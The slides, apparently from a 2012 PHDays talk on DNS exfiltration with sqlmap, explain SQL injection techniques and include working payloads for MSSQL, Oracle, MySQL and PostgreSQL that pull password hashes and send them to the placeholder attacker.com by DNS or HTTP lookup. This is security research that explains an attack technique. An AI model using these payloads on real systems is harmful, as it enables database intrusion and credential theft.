SlideShare a Scribd company logo

DNS exfiltration using sqlmap

Miroslav Stampar
Miroslav Stampar

These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.

Technology
1 of 26
Download to read offline
DNS exfiltration using sqlmap Miroslav Štampar (dev@sqlmap.org)
What is SQL injection? “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com) PHDays 2012, Moscow (Russia) May 31, 2012 2
What is SQL injection? (2)  In plain speak, SQL injection is all about the unauthorized database access  “Hello World” vulnerable code example (PHP/MySQL):     $sql = "SELECT * FROM events WHERE id = " .  $_GET["id"];     $result = mysql_query($sql);  Sample attack:   http://www.target.com/vuln.php?id=1 AND (SELECT 5502 FROM(SELECT COUNT(*),CONCAT(0x3a, (SELECT password FROM mysql.user LIMIT  0,1),0x3a,FLOOR(RAND(0)*2))x FROM  INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) PHDays 2012, Moscow (Russia) May 31, 2012 3
What is SQL injection? (3)  Harder example (PHP/MySQL):     error_reporting(0);     set_magic_quotes_runtime(true);     $sql=”INSERT INTO Users (FirstName, LastName,  Age) VALUES  ('$_REQUEST[firstname]','$_REQUEST[lastname]', $_REQUEST[age])”;     @mysql_query($sql); PHDays 2012, Moscow (Russia) May 31, 2012 4
Technique classification  Inband (web page as channel) Union  Full  Partial Error-based  Inference (bit-by-bit) Boolean-based blind Time-based (and stacked queries)  Out-of-band (alternative transport channels) HTTP DNS PHDays 2012, Moscow (Russia) May 31, 2012 5
Inband techniques  Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside DBMS error message  Union – UNION ALL SELECT NULL,...,  (<subquery>),NULL,NULL,..., fastest, in FULL variant whole table dump per request, in PARTIAL variant 1 query result per request PHDays 2012, Moscow (Russia) May 31, 2012 6
Inference techniques  Boolean-based blind – AND 1=1, slow, 1 bit per request, page differentiation based, low difference ratio represents True response, False otherwise (in most common cases)  Time-based – AND 1=IF(2>1,  BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1 12))),0), slowest, 1 bit per request, delay represents True response, False otherwise  Stacked queries – ;INSERT INTO users VALUES  (10, 'test', 'testpass'), usually time-based data retrieval PHDays 2012, Moscow (Russia) May 31, 2012 7
Out-of-band (OOB) techniques  HTTP – AND LENGTH(UTL_HTTP.REQUEST  ('http://www.attacker.com/log.php?q='|| (SELECT password FROM SYS.USER$ WHERE  name='SYS')))>0, fast, 1 (sub)query result per request, capturing/logging HTTP requests at the other side  DNS – AND LENGTH(UTL_INADDR.  GET_HOST_ADDRESS((SELECT password FROM  SYS.USER$ WHERE  name='SYS')||'.attacker.com'))>0, relatively fast, 1 part of (sub)query result per request, capturing/logging DNS requests at the other side PHDays 2012, Moscow (Russia) May 31, 2012 8
DNS protocol  relatively simple protocol  resolving domain names  UDP datagrams (except zone transfers which use TCP)  forwarding requests for arbitrary domain names  ...even if access to public networks is not allowed :) PHDays 2012, Moscow (Russia) May 31, 2012 9
DNS protocol (2)  Name resolving methods: Client lookup – checking local client's cache (same request already occurred) Iterative – checking DNS server's cache and configured zone records Recursive – if other methods fail, query is forwarded to others, sending back retrieved results to client PHDays 2012, Moscow (Russia) May 31, 2012 10
DNS protocol (3) PHDays 2012, Moscow (Russia) May 31, 2012 11
DNS exfiltration “Exfiltration [eks-fil-treyt, eks-fil-treyt] 1. verb (used without object) to escape furtively from an area under enemy control 2. verb (used with object) to smuggle out of an area under enemy control” (source: dictionary.reference.com) PHDays 2012, Moscow (Russia) May 31, 2012 12
DNS exfiltration (2)  When fast inband techniques fail data is (usually) extracted in a bit-by-bit manner  Most attackers will avoid exploitation of targets with time-based technique  Non-query SQL statements like INSERT/UPDATE/DELETE are especially problematic  Alternative methods are more than welcome (e.g. uploading of web shell scripts)  OOB techniques are rarely used (till now) PHDays 2012, Moscow (Russia) May 31, 2012 13
DNS exfiltration (3)  In some cases it's possible to incorporate SQL (sub)query results into DNS resolution requests  Any function that accepts network address could be used  Microsoft SQL Server, Oracle, MySQL and PostgreSQL  Potentially dozens of resulting characters can be transferred per single request PHDays 2012, Moscow (Russia) May 31, 2012 14
DNS exfiltration (4)  Microsoft SQL Server:     DECLARE @host varchar(1024);     SELECT @host=(SELECT TOP 1  master.dbo.fn_varbintohexstr(password_hash) FROM  sys.sql_logins WHERE name='sa')+'.attacker.com';     EXEC('master..xp_dirtree "'+@host+'c$"'); PHDays 2012, Moscow (Russia) May 31, 2012 15
DNS exfiltration (5)  Oracle:     SELECT DBMS_LDAP.INIT((SELECT password FROM  SYS.USER$ WHERE name='SYS')||'.attacker.com',80)  FROM DUAL;  MySQL:     SELECT LOAD_FILE(CONCAT('',(SELECT  password FROM mysql.user WHERE user='root' LIMIT  1),'.attacker.comfoobar')); PHDays 2012, Moscow (Russia) May 31, 2012 16
DNS exfiltration (6)  PostgreSQL:     DROP TABLE IF EXISTS table_output;     CREATE TABLE table_output(content text);     CREATE OR REPLACE FUNCTION temp_function()     RETURNS VOID AS $$     DECLARE exec_cmd TEXT;     DECLARE query_result TEXT;     BEGIN         SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE  usename='postgres');         exec_cmd := E'COPY table_output(content) FROM E''|| query_result||E'.attacker.comfoobar.txt'';         EXECUTE exec_cmd;     END;     $$ LANGUAGE plpgsql SECURITY DEFINER;     SELECT temp_function(); PHDays 2012, Moscow (Russia) May 31, 2012 17
DNS exfiltration (7) PHDays 2012, Moscow (Russia) May 31, 2012 18
DNS exfiltration (8) PHDays 2012, Moscow (Russia) May 31, 2012 19
Integration into sqlmap  New command line option: --dns-domain Turning on DNS exfiltration support Domain where should provoked DNS requests point to (e.g. --dns-domain=attacker.com)  DNS exfiltration vectors sent through previously detected SQLi (e.g. time-based)  Inband techniques have automatically higher priority  Hence, usable only in inference-only cases PHDays 2012, Moscow (Russia) May 31, 2012 20
Integration into sqlmap (2)  Domain name server entry (e.g. ns1.attacker.com) has to point to IP address of machine running sqlmap sqlmap being run as a fake DNS server Serving and logging all incoming DNS requests Dummy responses (e.g. 127.0.0.1) sent just to unblock web server instance PHDays 2012, Moscow (Russia) May 31, 2012 21
Integration into sqlmap (3)  Each pushed result enclosed with unique prefix and suffix (e.g. Xzk. … .iUR.attacker.com) Cancelling caching mechanisms Easy to match SQLi requests with DNS results  Complying with RFC 1034 (Domain Names – Concepts and Facilities) Hex encoding results to preserve non-word chars Splitting long items to parts of length 63 (maximum length of one label name) Otherwise DNS resolution requests are immediately dropped as invalid (no resolution) PHDays 2012, Moscow (Russia) May 31, 2012 22
Experimental setup 1)Attacker (172.16.138.1) ➢ physical machine – Ubuntu 12.04 LTS 64-bit OS ➢ sqlmap v1.0-dev (r5100) 2)Web Server (172.16.138.129) ➢ virtual machine – Windows XP 32-bit SP1 OS ➢ XAMPP 1.7.3 with SQLi vulnerable MySQL/PHP web application 3)DNS Server (172.16.138.130) ➢ virtual machine – CentOS 6.2 64-bit OS ➢ BIND9 DNS daemon PHDays 2012, Moscow (Russia) May 31, 2012 23
Results (--dump -T COLLATIONS -D information_schema) Method # of requests Time (sec) Boolean-based blind 29,212 214.04 Time-based (1 sec) 32,716 17,720.51 Error-based 777 9.02 Union (full/partial) 3/136 0.70/2.50 DNS exfiltration 1,409 35.31 PHDays 2012, Moscow (Russia) May 31, 2012 24
Video presentation PHDays 2012, Moscow (Russia) May 31, 2012 25
Questions? PHDays 2012, Moscow (Russia) May 31, 2012 26

Recommended

sqlmap internals
sqlmap internalssqlmap internals
sqlmap internalsMiroslav Stampar
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the HoodMiroslav Stampar
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar
 

Recommended

sqlmap internals
sqlmap internalssqlmap internals
sqlmap internalsMiroslav Stampar
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the HoodMiroslav Stampar
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1Bernardo Damele A. G.
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksMiroslav Stampar
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLiMiroslav Stampar
 

More Related Content

What's hot

sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 

What's hot (20)

sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the database
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql injection
Sql injectionSql injection
Sql injection
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 

Viewers also liked

Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksMiroslav Stampar
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)Miroslav Stampar
 
WordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressWordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressandrewnacin
 
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...Shannon Smith
 
eMusic: WordPress in the Enterprise
eMusic: WordPress in the EnterpriseeMusic: WordPress in the Enterprise
eMusic: WordPress in the EnterpriseScott Taylor
 
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...andrewnacin
 
E-commerce & WordPress: Navigating the Minefield
E-commerce & WordPress: Navigating the MinefieldE-commerce & WordPress: Navigating the Minefield
E-commerce & WordPress: Navigating the MinefieldIngenesis Limited
 
Don't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit TestingDon't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit Testingaaronjorbin
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacksMiroslav Stampar
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web VulnerabilityMiroslav Stampar
 
Coding, Scaling, and Deploys... Oh My!
Coding, Scaling, and Deploys... Oh My!Coding, Scaling, and Deploys... Oh My!
Coding, Scaling, and Deploys... Oh My!Mark Jaquith
 

Viewers also liked (18)

Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & Tricks
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLi
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS Attack
 
WordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressWordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPress
 
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
 
eMusic: WordPress in the Enterprise
eMusic: WordPress in the EnterpriseeMusic: WordPress in the Enterprise
eMusic: WordPress in the Enterprise
 
Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the Buffer
 
Index chrome
Index chromeIndex chrome
Index chrome
 
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
 
How Testing Changed My Life
How Testing Changed My LifeHow Testing Changed My Life
How Testing Changed My Life
 
E-commerce & WordPress: Navigating the Minefield
E-commerce & WordPress: Navigating the MinefieldE-commerce & WordPress: Navigating the Minefield
E-commerce & WordPress: Navigating the Minefield
 
Don't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit TestingDon't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit Testing
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web Vulnerability
 
Coding, Scaling, and Deploys... Oh My!
Coding, Scaling, and Deploys... Oh My!Coding, Scaling, and Deploys... Oh My!
Coding, Scaling, and Deploys... Oh My!
 

Similar to DNS exfiltration using sqlmap

Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.Positive Hack Days
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPositive Hack Days
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPositive Hack Days
 
Building node.js applications with Database Jones
Building node.js applications with Database JonesBuilding node.js applications with Database Jones
Building node.js applications with Database JonesJohn David Duncan
 
Sql injection
Sql injectionSql injection
Sql injectionBee_Ware
 
Distributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevdayDistributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevdayodnoklassniki.ru
 
A survey of DNSSEC Deployment in the US R&E Community
A survey of DNSSEC Deployment in the US R&E CommunityA survey of DNSSEC Deployment in the US R&E Community
A survey of DNSSEC Deployment in the US R&E CommunityShumon Huque
 
Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2rusersla
 
Yandex.Mail success story
Yandex.Mail success storyYandex.Mail success story
Yandex.Mail success storydev1ant
 
About "Apache Cassandra"
About "Apache Cassandra"About "Apache Cassandra"
About "Apache Cassandra"Jihyun Ahn
 
Jump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with DatabricksJump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with DatabricksAnyscale
 
Teradata online training
Teradata online trainingTeradata online training
Teradata online trainingMonster Courses
 
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...Citus Data
 
The two faces of sql parameter sniffing
The two faces of sql parameter sniffingThe two faces of sql parameter sniffing
The two faces of sql parameter sniffingIvo Andreev
 
Cloudb @ FOSDEM 2011
Cloudb @ FOSDEM 2011Cloudb @ FOSDEM 2011
Cloudb @ FOSDEM 2011tsutomi
 

Similar to DNS exfiltration using sqlmap (20)

Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
 
RDBMS vs NoSQL
RDBMS vs NoSQLRDBMS vs NoSQL
RDBMS vs NoSQL
 
Mdb dn 2016_06_query_primer
Mdb dn 2016_06_query_primerMdb dn 2016_06_query_primer
Mdb dn 2016_06_query_primer
 
Building node.js applications with Database Jones
Building node.js applications with Database JonesBuilding node.js applications with Database Jones
Building node.js applications with Database Jones
 
Sql injection
Sql injectionSql injection
Sql injection
 
phptut4
phptut4phptut4
phptut4
 
phptut4
phptut4phptut4
phptut4
 
Distributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevdayDistributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevday
 
A survey of DNSSEC Deployment in the US R&E Community
A survey of DNSSEC Deployment in the US R&E CommunityA survey of DNSSEC Deployment in the US R&E Community
A survey of DNSSEC Deployment in the US R&E Community
 
Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2
 
Yandex.Mail success story
Yandex.Mail success storyYandex.Mail success story
Yandex.Mail success story
 
About "Apache Cassandra"
About "Apache Cassandra"About "Apache Cassandra"
About "Apache Cassandra"
 
Quebec pdo
Quebec pdoQuebec pdo
Quebec pdo
 
Jump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with DatabricksJump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with Databricks
 
Teradata online training
Teradata online trainingTeradata online training
Teradata online training
 
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
 
The two faces of sql parameter sniffing
The two faces of sql parameter sniffingThe two faces of sql parameter sniffing
The two faces of sql parameter sniffing
 
Cloudb @ FOSDEM 2011
Cloudb @ FOSDEM 2011Cloudb @ FOSDEM 2011
Cloudb @ FOSDEM 2011
 

More from Miroslav Stampar

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"Miroslav Stampar
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Miroslav Stampar
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseMiroslav Stampar
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureMiroslav Stampar
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsMiroslav Stampar
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 

More from Miroslav Stampar (8)

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"
 
Blind WAF identification
Blind WAF identificationBlind WAF identification
Blind WAF identification
 
sqlmap internals
sqlmap internalssqlmap internals
